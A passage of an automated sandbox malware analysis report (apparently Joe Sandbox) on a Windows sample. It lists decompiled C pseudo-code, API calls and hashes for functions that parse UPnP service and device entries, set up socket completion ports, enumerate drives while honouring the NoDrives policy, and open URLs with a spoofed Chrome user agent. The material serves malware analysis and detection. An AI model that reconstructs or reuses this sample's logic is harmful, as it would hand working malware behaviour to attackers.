                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"serviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}












                                                                                  0x0040cab6
                                                                                  0x0040cabd
                                                                                  0x0040cac7
                                                                                  0x0040cad0
                                                                                  0x0040cad8
                                                                                  0x0040cae8
                                                                                  0x0040cafa
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x0040caf7
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb74
                                                                                  0x0040cb7f
                                                                                  0x0040cb84
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbf1
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cbf3
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cafa
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction ID: 6fe4328499d7c23ea6979e2b1e9447d84fd35b94008c8ce13c1bdcec141f7028
                                                                                  • Opcode Fuzzy Hash: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction Fuzzy Hash: 3641FB75A0020ADFDB04CF98D885BAFB7B5BF48304F208269E515B7390D778AD85CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040E330(intOrPtr __eax, void* _a4) {
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t20;
                                                                                  				long _t28;
                                                                                  				long _t37;
                                                                                  				intOrPtr _t45;
                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                  				long _t49;
                                                                                  				void* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t55;
                                                                                  
                                                                                  				_t53 = _a4;
                                                                                  				_t45 = __eax;
                                                                                  				if(_t53 != 0xffffffff) {
                                                                                  					_t48 = __eax + 0x20;
                                                                                  					_t37 = 0;
                                                                                  					EnterCriticalSection(_t48);
                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                  					if(_t20 != 0) {
                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                  							if(_t20 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  							}
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t37 = 1;
                                                                                  					}
                                                                                  					L7:
                                                                                  					LeaveCriticalSection(_t48);
                                                                                  					if(_t37 == 0) {
                                                                                  						_t49 = E00408E40(0x284);
                                                                                  						_t55 = _t54 + 4;
                                                                                  						if(_t49 == 0) {
                                                                                  							L13:
                                                                                  							E00409940(_t53);
                                                                                  							return _t49;
                                                                                  						} else {
                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                  							 *_t49 = 0x69636c69;
                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                  							_a4 = 0x10;
                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                  								E00408FB0(_t49);
                                                                                  								_t55 = _t55 + 4;
                                                                                  								_t49 = 0;
                                                                                  								goto L13;
                                                                                  							} else {
                                                                                  								_t28 = E0040C210();
                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                  								InitializeCriticalSection(_t14);
                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                  								E0040E250(_t49);
                                                                                  								return _t49;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						return 0;
                                                                                  					}
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}













                                                                                  0x0040e331
                                                                                  0x0040e336
                                                                                  0x0040e33b
                                                                                  0x0040e344
                                                                                  0x0040e348
                                                                                  0x0040e34a
                                                                                  0x0040e350
                                                                                  0x0040e355
                                                                                  0x0040e357
                                                                                  0x0040e35f
                                                                                  0x0040e367
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e369
                                                                                  0x00000000
                                                                                  0x0040e367
                                                                                  0x0040e36b
                                                                                  0x0040e36b
                                                                                  0x0040e36d
                                                                                  0x0040e36e
                                                                                  0x0040e376
                                                                                  0x0040e389
                                                                                  0x0040e38b
                                                                                  0x0040e390
                                                                                  0x0040e42d
                                                                                  0x0040e42e
                                                                                  0x0040e43c
                                                                                  0x0040e396
                                                                                  0x0040e39b
                                                                                  0x0040e3a3
                                                                                  0x0040e3a9
                                                                                  0x0040e3af
                                                                                  0x0040e3b7
                                                                                  0x0040e3d4
                                                                                  0x0040e423
                                                                                  0x0040e428
                                                                                  0x0040e42b
                                                                                  0x00000000
                                                                                  0x0040e3d6
                                                                                  0x0040e3d6
                                                                                  0x0040e3dc
                                                                                  0x0040e3e0
                                                                                  0x0040e3e6
                                                                                  0x0040e3ec
                                                                                  0x0040e3f0
                                                                                  0x0040e3f6
                                                                                  0x0040e400
                                                                                  0x0040e406
                                                                                  0x0040e410
                                                                                  0x0040e416
                                                                                  0x0040e421
                                                                                  0x0040e421
                                                                                  0x0040e3d4
                                                                                  0x0040e378
                                                                                  0x0040e37e
                                                                                  0x0040e37e
                                                                                  0x0040e33e
                                                                                  0x0040e341
                                                                                  0x0040e341

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E83B,00000000), ref: 0040E34A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E83B,00000000), ref: 0040E36E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction ID: 62d1bf2d84e0e1ba2e0a99c8f5ab924b94ee3ffd36670832191e74fbf46375e2
                                                                                  • Opcode Fuzzy Hash: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction Fuzzy Hash: F231D172201605ABC310ABB6EC48AD7B7E8FB44724F04893EF95DD3251DB39A4548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CCD1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"deviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  0x0040ccd1
                                                                                  0x0040ccd1
                                                                                  0x0040ccd1
                                                                                  0x0040ccd7
                                                                                  0x0040cce0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cce6
                                                                                  0x0040cce6
                                                                                  0x0040ccf0
                                                                                  0x0040ccf4
                                                                                  0x0040ccfd
                                                                                  0x0040cd05
                                                                                  0x0040cde3
                                                                                  0x00000000
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd15
                                                                                  0x0040cd1f
                                                                                  0x0040cd28
                                                                                  0x0040cd33
                                                                                  0x0040cd43
                                                                                  0x0040cd54
                                                                                  0x0040cd56
                                                                                  0x0040cd67
                                                                                  0x0040cd6e
                                                                                  0x0040cd70
                                                                                  0x0040cd70
                                                                                  0x0040cd7a
                                                                                  0x0040cd83
                                                                                  0x0040cd8b
                                                                                  0x0040cd93
                                                                                  0x0040cda3
                                                                                  0x0040cda8
                                                                                  0x0040cda8
                                                                                  0x0040cdab
                                                                                  0x0040cdaf
                                                                                  0x0040cdaf
                                                                                  0x0040cdb5
                                                                                  0x0040cdc1
                                                                                  0x0040cdc1
                                                                                  0x0040cd6e
                                                                                  0x0040cdc3
                                                                                  0x0040cdc7
                                                                                  0x0040cdc7
                                                                                  0x0040cdcd
                                                                                  0x0040cdd1
                                                                                  0x0040cdd5
                                                                                  0x0040cde1
                                                                                  0x00000000
                                                                                  0x0040cde1
                                                                                  0x0040cdd1
                                                                                  0x00000000
                                                                                  0x0040cd05
                                                                                  0x0040cde8
                                                                                  0x0040cdee

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction ID: 6e690da79745c02a31a5bb20c3c2194b08e0ef47a7b2c4a2d0bea9277cba1ccd
                                                                                  • Opcode Fuzzy Hash: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction Fuzzy Hash: 5A31CA75A1020ADFCB04DF99D884BEFBBB5BF88304F108669E515B7390D778A981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CAF1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"serviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  0x0040caf1
                                                                                  0x0040caf1
                                                                                  0x0040caf1
                                                                                  0x0040caf7
                                                                                  0x0040cb00
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040cb06
                                                                                  0x0040cb06
                                                                                  0x0040cb10
                                                                                  0x0040cb14
                                                                                  0x0040cb1d
                                                                                  0x0040cb25
                                                                                  0x0040cc03
                                                                                  0x00000000
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb35
                                                                                  0x0040cb3f
                                                                                  0x0040cb48
                                                                                  0x0040cb53
                                                                                  0x0040cb63
                                                                                  0x0040cb74
                                                                                  0x0040cb76
                                                                                  0x0040cb87
                                                                                  0x0040cb8e
                                                                                  0x0040cb90
                                                                                  0x0040cb90
                                                                                  0x0040cb9a
                                                                                  0x0040cba3
                                                                                  0x0040cbab
                                                                                  0x0040cbb3
                                                                                  0x0040cbc3
                                                                                  0x0040cbc8
                                                                                  0x0040cbc8
                                                                                  0x0040cbcb
                                                                                  0x0040cbcf
                                                                                  0x0040cbcf
                                                                                  0x0040cbd5
                                                                                  0x0040cbe1
                                                                                  0x0040cbe1
                                                                                  0x0040cb8e
                                                                                  0x0040cbe3
                                                                                  0x0040cbe7
                                                                                  0x0040cbe7
                                                                                  0x0040cbed
                                                                                  0x0040cbf1
                                                                                  0x0040cbf5
                                                                                  0x0040cc01
                                                                                  0x00000000
                                                                                  0x0040cc01
                                                                                  0x0040cbf1
                                                                                  0x00000000
                                                                                  0x0040cb25
                                                                                  0x0040cc08
                                                                                  0x0040cc0e

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction ID: 5740a4334c3a4aa6fa35b80b2035fb24052f91dcc8a06d59cd48ed0533e674c8
                                                                                  • Opcode Fuzzy Hash: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction Fuzzy Hash: 5731EA74A0020ADFCB14CF99D885BEFB7B5BF88304F108669E515B7390D778A985CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004048C0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				long _v20;
                                                                                  				signed int _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				int _v36;
                                                                                  				void* _t44;
                                                                                  
                                                                                  				_v20 = GetLogicalDrives();
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0x80000002;
                                                                                  				_v8 = 0x80000001;
                                                                                  				_v24 = 0;
                                                                                  				while(_v24 < 2) {
                                                                                  					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                  						_v32 = 0;
                                                                                  						_v36 = 4;
                                                                                  						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                  							_v16 = _v16 | _v32;
                                                                                  						}
                                                                                  						RegCloseKey(_v28);
                                                                                  					}
                                                                                  					_v24 = _v24 + 1;
                                                                                  				}
                                                                                  				return  !_v16 & _v20;
                                                                                  			}












                                                                                  0x004048cc
                                                                                  0x004048cf
                                                                                  0x004048d6
                                                                                  0x004048dd
                                                                                  0x004048e4
                                                                                  0x004048f6
                                                                                  0x0040491c
                                                                                  0x0040491e
                                                                                  0x00404925
                                                                                  0x00404949
                                                                                  0x00404957
                                                                                  0x00404957
                                                                                  0x0040495e
                                                                                  0x0040495e
                                                                                  0x004048f3
                                                                                  0x004048f3
                                                                                  0x00404971

                                                                                  APIs
                                                                                  • GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                  • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  Strings
                                                                                  • NoDrives, xrefs: 00404938
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404907
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                  • API String ID: 2666887985-3471754645
                                                                                  • Opcode ID: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction ID: 2b22d0c5c2d49d9c8cdb046828b539e9dc82b3d10e46f6989da5e31515f8ca9d
                                                                                  • Opcode Fuzzy Hash: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction Fuzzy Hash: 8411FCB5E4020A9BDF10DFD0D945BEFBBB4BB48704F108129E611B7280D7B85A45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D7F0(char* _a4, intOrPtr* _a8) {
                                                                                  				void* _v8;
                                                                                  				char _v9;
                                                                                  				void* _v16;
                                                                                  				void _v20;
                                                                                  				long _v24;
                                                                                  
                                                                                  				_v9 = 0;
                                                                                  				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 1, 0, 0, 0);
                                                                                  				if(_v16 != 0) {
                                                                                  					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						_v24 = 4;
                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                  							 *_a8 = _v20;
                                                                                  							_v9 = 1;
                                                                                  						}
                                                                                  						InternetCloseHandle(_v8);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v16);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}








                                                                                  0x0040d7f6
                                                                                  0x0040d80d
                                                                                  0x0040d814
                                                                                  0x0040d82c
                                                                                  0x0040d833
                                                                                  0x0040d835
                                                                                  0x0040d84f
                                                                                  0x0040d85c
                                                                                  0x0040d86e
                                                                                  0x0040d870
                                                                                  0x0040d870
                                                                                  0x0040d878
                                                                                  0x0040d878
                                                                                  0x0040d882
                                                                                  0x0040d882
                                                                                  0x0040d88e

                                                                                  APIs
                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D807
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D826
